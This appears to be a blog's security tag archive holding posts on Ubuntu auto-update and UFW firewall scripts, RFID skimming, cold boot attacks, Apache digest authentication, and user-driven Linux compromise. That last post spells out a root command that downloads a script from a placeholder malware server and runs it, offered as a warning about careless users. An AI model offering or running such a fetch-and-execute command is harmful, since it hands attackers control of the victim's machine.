Tag Archives: security

Auto update for Debian/Ubuntu

I use the following script to automatically update my Ubuntu box.
I don’t recommend using this on your production servers!

#!/bin/bash
 
#################################################
##                                             ##
## auto-update.sh v1.0                         ##
## Use this script to set up automatic updates ##
## on your debian/ubuntu box.                  ##
##                                             ##
#################################################
 
## Creating /usr/bin/auto-update.sh file
sudo touch /usr/bin/auto-update.sh
sudo chmod 700 /usr/bin/auto-update.sh
sudo chown root:root /usr/bin/auto-update.sh
echo '#!/bin/bash' | sudo tee /usr/bin/auto-update.sh
echo 'touch /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo "echo '------------------' >> /var/log/auto-update.log" | sudo tee -a /usr/bin/auto-update.sh
echo 'echo `date` >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo 'PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin' | sudo tee -a /usr/bin/auto-update.sh
echo 'export PATH' | sudo tee -a /usr/bin/auto-update.sh
echo '/usr/bin/aptitude update >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo '/usr/bin/aptitude -y safe-upgrade >> /var/log/auto-update.log' | sudo tee -a /usr/bin/auto-update.sh
echo 'exit' | sudo tee -a /usr/bin/auto-update.sh
 
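# Creating a cron job for root user (it will run /usr/bin/auto-update.sh every day at 14:30)
# Existing root crontab entries are kept; any earlier auto-update.sh entry is replaced
( sudo crontab -u root -l 2>/dev/null | grep -vF '/usr/bin/auto-update.sh'; echo '30 14 * * * /usr/bin/auto-update.sh > /dev/null' ) | sudo crontab -u root -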

Note that there are some dangers regarding automatic updates. You can read more about it here.

RFID tags

RFID (Radio-frequency identification) is an automatic identification method.
RFID tags can be used in passports, transportation payments, product tracking, transportation and logistics, lap scoring, and animal identification.
Human implants are also available, but experts have warned against using RFID to authenticate people because of the risk of identity theft.
In the video you’ll see how RFID tags can be accessed using inexpensive off-the-shelf components.
Researcher Chris Paget built a device consisting of a Symbol XR400 RFID reader (now manufactured by Motorola), a Motorola AN400 patch antenna mounted to the side of his Volvo XC90, and a Dell 710m that’s connected to the RFID reader by ethernet cable. The laptop runs a Windows application Paget developed that continuously prompts the RFID reader to look for tags and logs the serial number each time one is detected. He bought most of the gear via auctions listed on eBay.
Watch and be scared!

https://www.youtube.com/watch?v=9isKnDiJNPk

How to write a linux virus

After reading an interesting article about Linux “viruses” (the comments are interesting, too), I decided to raise the alarm about the source of many security-related issues in today’s computers: the user.
The author talks about the many ways to compromise a Linux box, even if you are not root.
I will not get into technical methods; you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t believe me? Try a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– have them open a terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -O /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Consider that every one of us knows a person like that.
It’s not hard to make a user click on a link or run a command.
The attackers just have to find ways to extract information from the compromised box.
At the end of the article, the author talks about solutions to this problem.

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.

In conclusion, there are no bullet-proof systems, only users who are too careless and click every link that comes their mouse’s way.

Cold Boot Attacks on Encryption Keys

Some guys at Princeton University published the results of their attacks on popular disk encryption systems (BitLocker, FileVault, dm-crypt, and TrueCrypt) using no special devices or materials.
Find out more about their research here and here.

Sample firewall script for Hardy Heron

I just thought that you might be interested in a small script you can use in Hardy Heron.

It uses the new UFW (Uncomplicated firewall) introduced in this new Ubuntu distro.

The script is well commented, so everything is easy to understand.

Here is the script:

#!/bin/bash
 
  ## set the default policy to drop (deny) all connections
  sudo ufw default deny
 
  ## set logging ON
  sudo ufw logging on
 
  ## permit unrestricted traffic from a specific static IP address
  sudo ufw allow from 192.168.1.1    # maybe your router
 
  ## permit TCP connections on ssh port 22
  sudo ufw allow 22/tcp
 
  ## Allow Apache2
  sudo ufw allow 80/tcp
 
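  ## Allow MySQL (open to any source address; add "from 192.168.1.0/24" as in the Samba rules if only LAN clients need it)
  sudo ufw allow 3306/tcp
 
  ## Allow Bittorrent
  for port in {7881..7889};
  do sudo ufw allow "$port/tcp"; done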
 
  ## Allow eMule
  sudo ufw allow 4662/tcp
  sudo ufw allow 4672/udp
 
  ## Allow DC++
  sudo ufw allow 6845
 
  ## Allow Samba from internal network only 
  sudo ufw allow proto tcp from 192.168.1.0/24 to any port 135 # used by smbd
  sudo ufw allow proto udp from 192.168.1.0/24 to any port 137 # used by nmbd
  sudo ufw allow proto udp from 192.168.1.0/24 to any port 138 # used by nmbd
  sudo ufw allow proto tcp from 192.168.1.0/24 to any port 139 # used by smbd
  sudo ufw allow proto tcp from 192.168.1.0/24 to any port 445 # used by smbd
 
  ## Display rules
  sudo ufw status

You can modify it by adding/removing rules accordingly.

Enabling Authentication with apache

Enabling Authentication

There are two different ways to authenticate with Apache.

– Basic Authentication: the password is passed from client to server in plain text across the network;
– Digest Authentication: the password is transmitted as an MD5 digest, which is more secure.

To avoid having our password transmitted as clear text, we are going to use Digest Authentication.
This kind of authentication relies on an Apache module which is not enabled by default: auth_digest.
To enable it, simply run:
sudo a2enmod auth_digest
Now that Apache can handle Digest Authentication, we need to set up a user/password/realm using:
htdigest -c /var/www/munin/.htpasswd munin foo
